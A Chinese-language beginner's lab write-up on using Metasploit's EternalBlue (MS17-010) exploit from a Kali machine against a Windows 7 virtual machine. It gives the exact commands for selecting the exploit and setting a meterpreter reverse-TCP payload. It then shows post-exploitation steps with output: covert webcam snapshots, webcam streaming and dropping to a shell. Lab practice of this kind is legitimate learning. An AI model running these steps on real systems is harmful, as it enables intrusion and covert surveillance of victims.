MSF入门练手

这几天舍友一直在研究metasploit,于是也带我入了一下坑,搭了个虚拟机玩玩永恒之蓝

准备环境:

  • kali (攻击机) ip:192.168.137.202
  • windows7 (被攻击机) ip:192.168.137.11

1.启动metasploit

1
2
service postgresql start
msfconsole

2.然后我们搜一下可利用的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
search  eternalblue

msf > search eternalblue

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/smb/ms17_010_command 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
exploit/windows/smb/ms17_010_psexec 2017-03-14 normal MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

这里我们选择第3个exp来用

1
use exploit/windows/smb/ms17_010_eternalblue

然后通过options可以看到一些参数,接下来就设置目标ip和本地ip还有payload

1
2
3
set rhost 192.168.137.11
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.137.202

3.直接开打

看到有WIN字样就说明攻击成功

可以看到我们控制的靶机系统

1
2
3
4
5
6
7
8
9
10
11
12
13
这里可以给被攻击机拍摄照片并传回来
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/AnlffeOA.jpeg

#控制靶机开启视频监控
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: PMxWScNA.html
[*] Streaming...
1
2
返回靶机的shell
meterpreter > shell